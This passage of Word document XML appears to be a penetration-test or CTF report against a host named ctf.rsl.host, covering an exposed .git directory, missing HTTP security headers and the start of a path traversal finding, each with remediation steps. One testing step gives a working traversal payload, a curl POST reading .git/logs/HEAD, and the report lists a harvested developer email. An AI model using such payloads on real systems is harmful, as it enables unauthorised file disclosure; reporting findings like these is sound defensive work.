      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182C09C" w14:textId="211BF04D" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="00165618" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00165618">
        <w:t xml:space="preserve">The application's </w:t>
      </w:r>
      <w:r w:rsidRPr="00494B69">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r w:rsidRPr="00165618">
        <w:t xml:space="preserve"> directory is accessible through the path traversal vulnerability, exposing the complete development history and sensitive information. The git logs reveal developer email addresses, repository locations, and commits</w:t>
      </w:r>
      <w:r w:rsidR="002B658F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00165618">
        <w:t xml:space="preserve"> This information disclosure provides valuable reconnaissance data for attackers and may contain credentials, API keys, or other sensitive data in commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20240B39" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF8B5D" w14:textId="77777777" w:rsidR="0073326C" w:rsidRDefault="0073326C" w:rsidP="0073326C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove </w:t>
      </w:r>
      <w:r w:rsidRPr="00494B69">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directories from production deployments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75224300" w14:textId="77777777" w:rsidR="0073326C" w:rsidRDefault="0073326C" w:rsidP="0073326C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use proper build pipelines that exclude development artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E715D7F" w14:textId="77777777" w:rsidR="0073326C" w:rsidRDefault="0073326C" w:rsidP="0073326C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00494B69">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> files to prevent committing sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CACC7" w14:textId="77777777" w:rsidR="0073326C" w:rsidRDefault="0073326C" w:rsidP="0073326C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use environment variables or secure vaults for configuration data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CF486D" w14:textId="45856759" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="0073326C" w:rsidP="0073326C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Regular security audits of git history for exposed secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281A3259" w14:textId="77777777" w:rsidR="008A6460" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E5CF9" w14:textId="77777777" w:rsidR="00101F68" w:rsidRDefault="00101F68" w:rsidP="00101F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discovered </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE160C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directory through admin panel file listing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C18285" w14:textId="77777777" w:rsidR="00101F68" w:rsidRDefault="00101F68" w:rsidP="00101F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessed git logs: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE160C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -X POST https://ctf.rsl.host/data -d "data_source=....//....//....///.git//logs//HEAD"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8D56D" w14:textId="77777777" w:rsidR="00101F68" w:rsidRDefault="00101F68" w:rsidP="00101F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extracted developer information: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE160C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>david.yesland@rhinosecuritylabs.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E0776A" w14:textId="77777777" w:rsidR="00101F68" w:rsidRDefault="00101F68" w:rsidP="00101F68">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identified repository: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE160C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>git@github.com:RhinoSecurityLabs/interview_w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C58BE49" w14:textId="5F367CC4" w:rsidR="008A6460" w:rsidRDefault="00D37E19" w:rsidP="00D37E19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66ED263C" wp14:editId="0D8D8A59">
            <wp:extent cx="5935980" cy="3169920"/>
            <wp:effectExtent l="95250" t="95250" r="102870" b="87630"/>
            <wp:docPr id="19689245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4AF23F" w14:textId="2E343B81" w:rsidR="00D37E19" w:rsidRDefault="00D37E19" w:rsidP="00D37E19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CC4903C" wp14:editId="54FEA449">
            <wp:extent cx="5943600" cy="579120"/>
            <wp:effectExtent l="95250" t="95250" r="95250" b="87630"/>
            <wp:docPr id="1867566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6199BA" w14:textId="2D7D448C" w:rsidR="00D37E19" w:rsidRDefault="002449F6" w:rsidP="00D37E19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39BB8D6B" wp14:editId="76302EA9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2474686</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1189174</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1415143" cy="85271"/>
                <wp:effectExtent l="19050" t="19050" r="13970" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="697669902" name="Rectangle 24"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1415143" cy="85271"/>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A4C74" id="Rectangle 24" o:spid="_x0000_s1026" style="position:absolute;margin-left:194.85pt;margin-top:93.65pt;width:111.45pt;height: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" filled="f" strokecolor="#e00" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D37E19">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D58CF91" wp14:editId="08AB1084">
            <wp:extent cx="5928360" cy="2971800"/>
            <wp:effectExtent l="95250" t="95250" r="91440" b="95250"/>
            <wp:docPr id="19776571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971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5E9721" w14:textId="77777777" w:rsidR="008E6312" w:rsidRDefault="008E6312" w:rsidP="00D37E19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA42C3F" w14:textId="77777777" w:rsidR="008E6312" w:rsidRPr="008C2BC7" w:rsidRDefault="008E6312" w:rsidP="00D37E19">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5947C2D3" w14:textId="288DCDAE" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00FB51A3">
        <w:t>Missing Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310A0094" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Risk Rating: [Critical / High / </w:t>
      </w:r>
      <w:r w:rsidRPr="001938DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="001938DE">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C50521" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Exploitation Likelihood: [Critical / High / </w:t>
      </w:r>
      <w:r w:rsidRPr="001938DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="001938DE">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C62BB40" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t xml:space="preserve">Potential Impact: [Critical / High / </w:t>
      </w:r>
      <w:r w:rsidRPr="001938DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r w:rsidRPr="001938DE">
        <w:rPr>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B64E2E" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5180E" w14:textId="77777777" w:rsidR="00051F9D" w:rsidRDefault="00051F9D" w:rsidP="00051F9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00051F9D">
        <w:t xml:space="preserve">The application lacks essential HTTP security headers that protect against common client-side attacks. Missing headers include </w:t>
      </w:r>
      <w:r w:rsidRPr="00B10521">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>X-Content-Type-Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00051F9D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B10521">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00051F9D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B10521">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00051F9D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B10521">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>X-XSS-Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00051F9D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B10521">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Strict-Transport-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00051F9D">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B10521">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Referrer-Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00051F9D">
        <w:t>. The absence of these headers makes the application vulnerable to clickjacking, MIME sniffing attacks, cross-site scripting, and other client-side security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C631E11" w14:textId="6582F45A" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1150EE12" w14:textId="77777777" w:rsidR="00244A1D" w:rsidRDefault="00244A1D" w:rsidP="00244A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="002159E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to prevent MIME sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9DEEF" w14:textId="77777777" w:rsidR="00244A1D" w:rsidRDefault="00244A1D" w:rsidP="00244A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r w:rsidRPr="002159E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>X-Frame-Options: DENY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="002159E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SAMEORIGIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to prevent clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A7215" w14:textId="77777777" w:rsidR="00244A1D" w:rsidRDefault="00244A1D" w:rsidP="00244A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r w:rsidRPr="002159E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to restrict resource loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7761C0" w14:textId="77777777" w:rsidR="00244A1D" w:rsidRDefault="00244A1D" w:rsidP="00244A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="002159E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Strict-Transport-Security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for HTTPS enforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51853396" w14:textId="341BC60F" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="00244A1D" w:rsidP="00244A1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set appropriate </w:t>
      </w:r>
      <w:r w:rsidRPr="002159E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Referrer-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002159E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>X-XSS-Protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6DC491" w14:textId="6388E332" w:rsidR="00CB7E48" w:rsidRDefault="008A6460" w:rsidP="00426D2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Testing Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6AF6C1" w14:textId="77777777" w:rsidR="004079D6" w:rsidRDefault="004079D6" w:rsidP="004079D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Analyzed HTTP response headers: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA4097">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl -I https://ctf.rsl.host/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8902AF" w14:textId="77777777" w:rsidR="004079D6" w:rsidRDefault="004079D6" w:rsidP="004079D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tested multiple endpoints to confirm consistent absence of security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F0DE07" w14:textId="622976F8" w:rsidR="004079D6" w:rsidRPr="008C2BC7" w:rsidRDefault="004079D6" w:rsidP="004079D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verified lack of protection against common client-side attacks</w:t>
      </w:r>
      <w:r w:rsidR="003B5BED">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003B5BED" w:rsidRPr="00195D61">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="003B5BED">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="003B5BED" w:rsidRPr="00195D61">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="003B5BED">
        <w:t xml:space="preserve"> below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7207DF8D" w14:textId="0051070A" w:rsidR="008A6460" w:rsidRDefault="0035287F" w:rsidP="0035287F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="351886B7" wp14:editId="7BBC10BF">
            <wp:extent cx="5936615" cy="2791460"/>
            <wp:effectExtent l="95250" t="95250" r="102235" b="104140"/>
            <wp:docPr id="1890023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27914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CE535C" w14:textId="77777777" w:rsidR="00643941" w:rsidRDefault="00643941" w:rsidP="0035287F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72B37BC0" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="7F936633" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="16B67C61" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="1312F748" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="3623865D" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="235A08DE" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="033D8E7C" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="09EE05A2" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="353CE6EE" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="0AA174A6" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="25A62754" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="07DF814B" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="70EBFB99" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="73A3D543" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="0886692E" w14:textId="77777777" w:rsidR="00406C7E" w:rsidRPr="008C2BC7" w:rsidRDefault="00406C7E" w:rsidP="00406C7E"/>
    <w:p w14:paraId="2B4C873C" w14:textId="6879575B" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00EA76A9" w:rsidRPr="00EA76A9">
        <w:t>Path Traversal - File Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ECD73F" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Risk Rating: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00406C7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00406C7E">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ High / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A6C8B" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Exploitation Likelihood: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00406C7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00406C7E">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>/ High / Medium / Low]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2F679" w14:textId="77777777" w:rsidR="008A6460" w:rsidRPr="008C2BC7" w:rsidRDefault="008A6460" w:rsidP="008A6460">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008C2BC7">
        <w:t>Potential Impact: [</w:t>
      </w:r>
      <w:r w:rsidRPr="00406C7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00406C7E">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
